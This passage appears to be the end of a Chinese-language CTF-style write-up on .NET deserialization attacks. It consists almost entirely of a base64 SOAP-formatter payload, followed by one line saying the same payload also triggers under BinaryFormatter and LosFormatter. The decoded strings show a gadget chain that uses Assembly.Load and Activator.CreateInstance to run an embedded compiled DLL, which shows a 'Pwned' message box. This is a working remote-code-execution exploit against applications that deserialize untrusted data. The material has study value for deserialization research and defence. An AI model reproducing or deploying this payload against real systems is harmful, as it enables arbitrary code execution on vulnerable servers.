AYtAAAANFN5c3RlbS5SdW50aW1lLlJlbW90aW5nLkNoYW5uZWxzLkFnZ3JlZ2F0ZURpY3Rpb25hcnkEAAAABi4AAABLbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1 NjE5MzRlMDg5EBYAAAABAAAACQYAAAAQFwAAAAIAAAAJBwAAAAkHAAAAEBgAAAACAAAABjEAAAAACTEAAAAEGwAAAH9TeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5MaXN0YDFbW1N5c3RlbS5CeXRlW10sIG1zY29ybGliLCBWZXJzaW9 uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAwAAAAZfaXRlbXMFX3NpemUIX3ZlcnNpb24DAAAPU3lzdGVtLkJ5dGVbXVtdCAgJMgAAAAEAAAABAAAABBwAAAAiU3lzdGVtLk RlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcgIAAAAIRGVsZWdhdGUHbWV0aG9kMAMDMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeS9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsa XphdGlvbkhvbGRlcgkzAAAACTQAAAAEHQAAAIoBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuTGlzdGAxK0VudW1lcmF0b3JbW1N5c3RlbS5CeXRlW10sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwg UHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAARsaXN0BWluZGV4B3ZlcnNpb24HY3VycmVudAMAAAd/U3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuTGlzdGAxW1tTeXN0ZW0uQnl0ZVtdLCBtc2NvcmxpYiwgVmVyc2l vbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQgIAgoAAAAAAAAAAAoBIQAAABwAAAAJNQAAAAk2AAAAASUAAAAcAAAACTcAAAAJOAAAAAErAAAAAwAAAAk5AAAACToAAAAHMg AAAAEBAAAABAAAAAcCCTsAAAAKCgoEMwAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRUeXBlTmFtZ QptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQY8AAAA1QFTeXN0ZW0uRnVuY2AyW1tTeXN0ZW0uQnl0ZVtdLCBtc2NvcmxpYiwgVmVyc2lv bj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCB QdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JLgAAAAoJLgAAAAY+AAAAGlN5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5Bj8AAAAETG9hZAoENAAAAC9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbk hvbGRlcgcAAAAETmFtZQxBc3NlbWJseU5hbWUJQ2xhc3NOYW1lCVNpZ25hdHVyZQpTaWduYXR1cmUyCk1lbWJlclR5cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEBAAMIDVN5c3RlbS5UeXBlW10JPwAAAAkuAAAACT4AAAAGQgAAACdTeXN0Z W0uUmVmbGVjdGlvbi5Bc3NlbWJseSBMb2FkKEJ5dGVbXSkGQwAAAC5TeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseSBMb2FkKFN5c3RlbS5CeXRlW10pCAAAAAoBNQAAADMAAAAGRAAAAMwCU3lzdGVtLkZ1bmNgMltbU3lzdGVtLlJlZmxl Y3Rpb24uQXNzZW1ibHksIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhYmxlYDF bW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cm FsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JLgAAAAoJLgAAAAk+AAAABkcAAAAIR2V0VHlwZXMKATYAAAA0AAAACUcAAAAJLgAAAAk+AAAABkoAAAAYU3lzdGVtLlR5cGVbXSBHZXRUeXBlcygpBksAAAAYU3lzdGVtL lR5cGVbXSBHZXRUeXBlcygpCAAAAAoBNwAAADMAAAAGTAAAAMYBU3lzdGVtLkZ1bmNgMltbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYx OTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCS4AAAAKCS4AAAAGTgAAABBTeXN0ZW0uQWN0aXZhdG9 yBk8AAAAOQ3JlYXRlSW5zdGFuY2UKATgAAAA0AAAACU8AAAAJLgAAAAlOAAAABlIAAAApU3lzdGVtLk9iamVjdCBDcmVhdGVJbnN0YW5jZShTeXN0ZW0uVHlwZSkGUwAAAClTeXN0ZW0uT2JqZWN0IENyZWF0ZUluc3RhbmNlKFN5c3RlbS 5UeXBlKQgAAAAKATkAAAALAAAABlQAAAAmU3lzdGVtLkNvbXBvbmVudE1vZGVsLkRlc2lnbi5Db21tYW5kSUQEAAAACSoAAAAQOgAAAAIAAAAJVgAAAAgIACAAAA87AAAAABIAAAJNWpAAAwAAAAQAAAD//wAAuAAAAAAAAABAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAADh+6DgC0Cc0huAFMzSFUaGlzIHByb2dyYW0gY2Fubm90IGJlIHJ1biBpbiBET1MgbW9kZS4NDQokAAAAAAAAAFBFAABMAQMARnHPZQAAAAAAAAAA4AAiIAsBMAAACgAAAAYAAAAA AAAuKAAAACAAAABAAAAAAAAQACAAAAACAAAEAAAAAAAAAAYAAAAAAAAAAIAAAAACAAAAAAAAAwBghQAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAA3CcAAE8AAAAAQAAAeAMAAAAAAAAAAAAAAAAAAAAAAAAAYAAADAAAAKQmAAA cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAIAAAAAAAAAAAAAAAIIAAASAAAAAAAAAAAAAAALnRleHQAAAA0CAAAACAAAAAKAAAAAgAAAAAAAAAAAAAAAAAAIAAAYC5yc3JjAAAAeAMAAABAAAAABA AAAAwAAAAAAAAAAAAAAAAAAEAAAEAucmVsb2MAAAwAAAAAYAAAAAIAAAAQAAAAAAAAAAAAAAAAAABAAABCAAAAAAAAAAAAAAAAAAAAABAoAAAAAAAASAAAAAIABQB4IAAALAYAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAcgIoDwAACgAAcgEAAHByAQAAcBYfECgQAAAKJioiAHMBAAAGJioAAEJTSkIBAAEAAAAAAAwAAAB2NC4wLjMwMzE5AAAAAAUAbAAAAPABAAAjfgAAXAIAAJgCAAAjU3RyaW5ncwAAAAD0BAAAEAAA ACNVUwAEBQAAEAAAACNHVUlEAAAAFAUAABgBAAAjQmxvYgAAAAAAAAACAAABRxUAAAkAAAAA+gEzABYAAAEAAAAUAAAAAgAAAAIAAAABAAAAEAAAAA4AAAABAAAAAgAAAAAAnAEBAAAAAAAGAPcADwIGAGQBDwIGACsA3QEPAC8CAAAGAFM AxQEGANoAxQEGALsAxQEGAEsBxQEGABcBxQEGADABxQEGAGoAxQEGAD8A8AEGAB0A8AEGAJ4AxQEGAIUAggEGAHMCqgEKAIwCQwIKAHoCQwIKAFgCQwIKALYBQwIAAAAAAQAAAAAAAQABAAEAEABqAgAAQQABAAEAUCAAAAAAhhjXAQYAAQ BtIAAAAACWALEBLgABAAAAAQA+AgkA1wEBABEA1wEGABkA1wEKACkA1wEQADEA1wEQADkA1wEQAEEA1wEQAEkA1wEQAFEA1wEQAFkA1wEQAGEA1wEVAGkA1wEQAHEA1wEQAHkA1wEQAIEA1wEGAIkAhwIaAC4ACwA0AC4AEwA9AC4AGwBcA C4AIwBlAC4AKwB0AC4AMwB0AC4AOwB0AC4AQwBlAC4ASwB6AC4AUwB0AC4AWwB0AC4AYwCSAC4AawC8AC4AcwDJAASAAAABAAAAAAAAAAAAAAAAAAoAAAAEAAAAAAAAAAAAAAAlABQAAAAAAAQAAAAAAAAAAAAAACUAQwIAAAAAAAAAPE1v ZHVsZT4ARXhwQ2xhc3NhAG1zY29ybGliAEd1aWRBdHRyaWJ1dGUARGVidWdnYWJsZUF0dHJpYnV0ZQBDb21WaXNpYmxlQXR0cmlidXRlAEFzc2VtYmx5VGl0bGVBdHRyaWJ1dGUAQXNzZW1ibHlUcmFkZW1hcmtBdHRyaWJ1dGUAVGFyZ2V 0RnJhbWV3b3JrQXR0cmlidXRlAEFzc2VtYmx5RmlsZVZlcnNpb25BdHRyaWJ1dGUAQXNzZW1ibHlDb25maWd1cmF0aW9uQXR0cmlidXRlAEFzc2VtYmx5RGVzY3JpcHRpb25BdHRyaWJ1dGUAQ29tcGlsYXRpb25SZWxheGF0aW9uc0F0dH JpYnV0ZQBBc3NlbWJseVByb2R1Y3RBdHRyaWJ1dGUAQXNzZW1ibHlDb3B5cmlnaHRBdHRyaWJ1dGUAQXNzZW1ibHlDb21wYW55QXR0cmlidXRlAFJ1bnRpbWVDb21wYXRpYmlsaXR5QXR0cmlidXRlAFN5c3RlbS5SdW50aW1lLlZlcnNpb 25pbmcARXhwQ2xhc3NhLmRsbABTeXN0ZW0ATWFpbgBNZXNzYWdlQm94SWNvbgBTeXN0ZW0uUmVmbGVjdGlvbgAuY3RvcgBTeXN0ZW0uRGlhZ25vc3RpY3MAU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzAFN5c3RlbS5SdW50aW1l LkNvbXBpbGVyU2VydmljZXMARGVidWdnaW5nTW9kZXMAYXJncwBTeXN0ZW0uV2luZG93cy5Gb3JtcwBNZXNzYWdlQm94QnV0dG9ucwBFeHBDbGFzcwBPYmplY3QARGlhbG9nUmVzdWx0AFNob3cATWVzc2FnZUJveAAAAAtQAHcAbgBlAGQ AAAAAAK00MrKVZahFsxPKH8HhthQABCABAQgDIAABBSABARERBCABAQ4EIAEBAgoABBFJDg4RTRFRCLd6XFYZNOCJBQABAR0OCAEACAAAAAAAHgEAAQBUAhZXcmFwTm9uRXhjZXB0aW9uVGhyb3dzAQgBAAcBAAAAAA4BAAlFeHBDbGFzc2 EAAAUBAAAAABcBABJDb3B5cmlnaHQgwqkgIDIwMjQAACkBACRBQzhERjFBRi03MjBELTRCRTctQUU0MC05MEQzRjU3RDhBQjAAAAwBAAcxLjAuMC4wAABNAQAcLk5FVEZyYW1ld29yayxWZXJzaW9uPXY0LjUuMgEAVA4URnJhbWV3b3JrR GlzcGxheU5hbWUULk5FVCBGcmFtZXdvcmsgNC41LjIAAAAAAEZxz2UAAAAAAgAAABwBAADAJgAAwAgAAFJTRFMEtmaoGwdvTKnj5k/WPUylAQAAAEU6XENURkxlYXJuaW5nXOW8gOWPkeWtpuS5oFxDc2hhcnBMZWFybmluZ1xFeHBDbGFz c2FcRXhwQ2xhc3NhXG9ialxEZWJ1Z1xFeHBDbGFzc2EucGRiAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABCgAAAAAAAAAAAAAHigAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAoAAAAAAAAAAAAAAAAX0Nvck RsbE1haW4AbXNjb3JlZS5kbGwAAAAAAP8lACAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAEAAAABgAAIAAAAAAAAAAAAAAAAAAAAEAAQAAADAAAI AAAAAAAAAAAAAAAAAAAAEAAAAAAEgAAABYQAAAHAMAAAAAAAAAAAAAHAM0AAAAVgBTAF8AVgBFAFIAUwBJAE8ATgBfAEkATgBGAE8AAAAAAL0E7/4AAAEAAAABAAAAAAAAAAEAAAAAAD8AAAAAAAAABAAAAAIAAAAAAAAAAAAAAAAAAABEA AAAAQBWAGEAcgBGAGkAbABlAEkAbgBmAG8AAAAAACQABAAAAFQAcgBhAG4AcwBsAGEAdABpAG8AbgAAAAAAAACwBHwCAAABAFMAdAByAGkAbgBnAEYAaQBsAGUASQBuAGYAbwAAAFgCAAABADAAMAAwADAAMAA0AGIAMAAAABoAAQABAEMA bwBtAG0AZQBuAHQAcwAAAAAAAAAiAAEAAQBDAG8AbQBwAGEAbgB5AE4AYQBtAGUAAAAAAAAAAAA8AAoAAQBGAGkAbABlAEQAZQBzAGMAcgBpAHAAdABpAG8AbgAAAAAARQB4AHAAQwBsAGEAcwBzAGEAAAAwAAgAAQBGAGkAbABlAFYAZQB yAHMAaQBvAG4AAAAAADEALgAwAC4AMAAuADAAAAA8AA4AAQBJAG4AdABlAHIAbgBhAGwATgBhAG0AZQAAAEUAeABwAEMAbABhAHMAcwBhAC4AZABsAGwAAABIABIAAQBMAGUAZwBhAGwAQwBvAHAAeQByAGkAZwBoAHQAAABDAG8AcAB5AH IAaQBnAGgAdAAgAKkAIAAgADIAMAAyADQAAAAqAAEAAQBMAGUAZwBhAGwAVAByAGEAZABlAG0AYQByAGsAcwAAAAAAAAAAAEQADgABAE8AcgBpAGcAaQBuAGEAbABGAGkAbABlAG4AYQBtAGUAAABFAHgAcABDAGwAYQBzAHMAYQAuAGQAb ABsAAAANAAKAAEAUAByAG8AZAB1AGMAdABOAGEAbQBlAAAAAABFAHgAcABDAGwAYQBzAHMAYQAAADQACAABAFAAcgBvAGQAdQBjAHQAVgBlAHIAcwBpAG8AbgAAADEALgAwAC4AMAAuADAAAAA4AAgAAQBBAHMAcwBlAG0AYgBsAHkAIABW AGUAcgBzAGkAbwBuAAAAMQAuADAALgAwAC4AMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAwAAAAwOAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAEVgAAAAtTeXN0ZW0uR3VpZAsAAAACX2ECX2ICX2MCX2QCX2UCX2YCX2cCX2gCX2kCX2oCX2sAAAAAAAAAAAAAAAgHBwICAgICAgICExPSdO4q0RGL+wCgyQ8m9ws=</SOAP-ENC:Array > </SOAP-ENV:Body > </SOAP-ENV:Envelope >
最终soap的payload如上。换成Binary或者Los都是一样可以触发的。